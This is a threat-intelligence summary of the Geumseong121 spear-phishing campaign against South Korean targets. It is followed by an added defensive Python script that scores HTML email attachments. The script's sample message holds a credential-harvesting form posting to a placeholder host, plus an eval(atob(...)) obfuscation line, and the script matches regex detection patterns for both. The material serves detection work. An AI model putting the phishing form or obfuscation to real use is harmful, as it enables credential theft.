Beware of emails from the 'Geumseong121' (금성121) group impersonating the 'complete survey to find separated families from North and South Korea'
2018-07-04 • ESTSecurity • Beware of emails from the 'Geumseong121' group impersonating a 'complete survey to find separated families from North and South Korea'
Operation Mystery Egg is described as an APT campaign by the Geumseong121 group that impersonated South Korea's Ministry of Unification and used a lure about a government survey on separated North-South families. Instead of attaching an executable or HWP file directly, the attackers sent an HTML attachment made to look like a password-protected secure-mail attachment, giving the spear-phishing a delivery vector different from the usual document attachment. The campaign also involved an HWP document vulnerability with added PostScript reverse obfuscation, and an encrypted payload hidden in the document stream that, once the shellcode ran, communicated covertly with Dropbox-based C2. The excerpt notes Russian-language code fragments among the indicators of compromise (IOCs) and assesses them as likely false-flag artifacts intended to confuse attribution analysis. The activity matters because it combines Korean government-themed social engineering, document exploitation, cloud-hosted C2, and deception tradecraft against South Korean targets.
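The secure-mail-styled HTML attachment is the part of this chain a mail gateway can triage before anything is opened. The following Python script is an added example written for this summary, not code from ESTSecurity or from the campaign analysis: it parses an .eml, pulls out HTML attachments, and scores them against three indicators typical of that lure shape. The sample message and the indicator set (a password prompt, a form posting to an external host, a decode-then-eval script) are constructed assumptions about how such attachments behave; the page does not attribute those specific contents to this campaign.

```python
import email
import re
from email import policy

# Constructed sample message (not from the page): an HTML attachment styled
# like a Korean "secure mail" wrapper that prompts for a password and posts
# it to a third-party host. Hosts and content are placeholders.
SAMPLE_EML = b"""\
From: survey@example.invalid
To: recipient@example.invalid
Subject: Survey on separated families (secure mail)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please open the attached secure mail to complete the survey.

--b1
Content-Type: text/html; charset="utf-8"; name="secure_mail.html"
Content-Disposition: attachment; filename="secure_mail.html"
Content-Transfer-Encoding: 7bit

<html><body>
<form method="post" action="https://collector.invalid/login">
  Enter your password: <input type="password" name="pw">
</form>
<script>eval(atob("YWxlcnQoMSk="));</script>
</body></html>
--b1--
"""

# Indicator set (assumed, not taken from the page) for a mailed HTML file
# that imitates a secure-mail attachment.
INDICATORS = {
    # A password prompt inside a mailed HTML file mimics the secure-mail wrapper.
    "password_form": re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I),
    # A form that submits to an external host sends whatever is typed off-site.
    "external_form_action": re.compile(r"<form[^>]*action\s*=\s*[\"']https?://", re.I),
    # Decode-then-execute chains are how an HTML attachment usually hides its payload.
    "decode_and_eval": re.compile(r"eval\s*\(\s*(atob|unescape)\s*\(", re.I),
}


def scan_html(html: str) -> list:
    """Return the names of every indicator that fires on the HTML text."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def triage_html_attachments(raw: bytes) -> list:
    """Parse a raw RFC 5322 message and score each HTML attachment.

    Only parts the email library classifies as attachments are examined; an
    HTML part without a Content-Disposition is treated as the message body.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" or name.endswith((".html", ".htm"))
        if not is_html:
            continue
        # decode=True handles base64/quoted-printable transfer encodings too.
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        hits = scan_html(body)
        # A password prompt or a decode-and-eval chain alone is enough to hold the mail.
        verdict = "quarantine" if ("password_form" in hits or "decode_and_eval" in hits) else "review"
        findings.append({"filename": name, "indicators": hits, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in triage_html_attachments(SAMPLE_EML):
        print(finding)
```

The script deliberately never renders the HTML or runs its script; it only pattern-matches the stored bytes, so it is safe to run over a quarantine mailbox. Any HTML attachment that reaches the `review` verdict is still worth a look, since a plain HTML file arriving as an attachment is unusual for a government survey in the first place.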